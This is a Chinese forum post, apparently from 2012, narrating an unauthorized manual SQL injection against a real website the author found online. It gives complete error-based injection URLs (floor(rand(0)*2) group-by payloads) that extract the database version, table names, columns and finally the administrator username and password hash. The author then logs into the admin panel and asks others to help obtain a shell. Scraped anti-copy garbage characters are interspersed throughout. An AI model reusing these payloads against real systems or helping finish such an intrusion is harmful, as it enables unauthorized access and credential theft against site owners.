近一直在学习数据库方面的知识,一直在钻研PHP的一些高级注入语法,感觉比较的有意思。于是就在网上找有洞的网站练习手注。于是有了下文。
% X6 w3 x; U! b m/ {: U: f首先找到网站后台,加了个admin,后台出来了 + L0 L- j r8 O/ O: a
" y# n S* f9 H" ^
. U7 v4 i2 k1 e4 q* N$ C5 y W( V
然后看了下网站,发现貌似都是html静态网页,但是通过图片链接发现应该是伪静态,于是在后面加了个 ',报错了,初步判断可以注入
6 W. v4 W% i% B1 {1 ghttp://www.myhack58.com/Article/UploadPic/2012-12/20121218145843714.jpg 从报错语句中我们可以判断出存在frame_board_conference 表,知道存在frame_board_conference,可以方便我们后面的注入。这里我用的是错误回显注入。 首先查下数据库相关信息。 www.xxx/modules/board/bd_view.html?id=conference&no=67+and+(select+count(*) from+frame_board_conference+group+by+concat(0x3a,concat(0x3a,database(),0x3a,version()),floor(rand(0)*2)))—
. h' u: S8 l, y" s4 p1 U* d# c' h9 u( `, \
- v0 c. O- u+ A: p; E$ B
a! c# T% t2 m4 n! K: m7 S
; L' h9 P- L# }1 Shttp://www.myhack58.com/Article/UploadPic/2012-12/20121218145846722.jpg
9 i( j3 h# o4 p; {; N/ g& [
" }7 I% z/ v% U: h# v6 K: w' R+ l& w3 I
: a8 A( b/ `' i0 t2 V
$ @% N$ @9 g1 a0 v3 r可以看到数据库版本为5.0.32,存在information_schema表,可以进一步的注入。 然后我们查表 http://xxx/modules/board/bd_view.html?id=conference&no=67+and+(select+count(*)+from+frame_board_conference+group+by+concat(0x3a,(select+substr(group_concat(table_name),1,150)from+information_schema.tables+where+table_schema=database()),0x3a,floor(rand(0)*2)))-- 得到管理员表段frame_administrator
; M8 E9 x4 g7 E# T2 ~; N) |$ L+ G. B
+ {: B% n: f) Q) K+ `% |http://www.myhack58.com/Article/UploadPic/2012-12/20121218145846695.jpg3 q0 l; B* {" ` B; D H
( V0 o9 U& k7 i4 C. s- m* |
5 S7 r+ y6 w- @* T# B8 A 查字段 http://www.xxx/modules/board/bd_view.html?id=conference&no=67+and+(select+count(*)+from+frame_board_conference+group+by+concat(0x3a,(select+substr(group_concat(column_name),1,150)from+information_schema.columns+where+table_name=0x6672616d655f61646d696e6973747261746f72),0x3a,floor(rand(0)*2)))--
) ^$ H& _3 c" v. U7 g3 |" t9 Y
9 F- P! [/ E+ n: R& f9 A( v n( ~& ^, E1 Q9 X& B1 Y
' f0 a* v/ t2 \. m1 ]
得到userID,userPass字段 最后 http://xxx/modules/board/bd_view.html?id=conference&no=67+and+(select+count(*)+from+frame_board_conference+group+by+concat(0x3a,(select+substr(group_concat(userID,0x3a,userPass,0x0a),1,150)from+frame_administrator),0x3a,floor(rand(0)*2)))--
7 W" p7 j, _- _3 Y E0 X( B% o3 G% n8 W" |1 W3 r: Z9 `
8 s( U& r* N$ p
1 Y1 U! q8 V$ h7 y0 E9 }- A# c
得到最终结果admin eb0a191797624dd3a48fa681d3061212 解密后成功进入后台,但是在获得shell的过程中出了点问题,可以穿php但是貌似无法解析,不知道什么原因,本人很菜,在这里希望大牛有兴趣的话帮忙拿下shell,感激不尽。Pm我,我把网址发给你。 | 
发表于 2012-12-20 09:00:35
收藏
支持
反对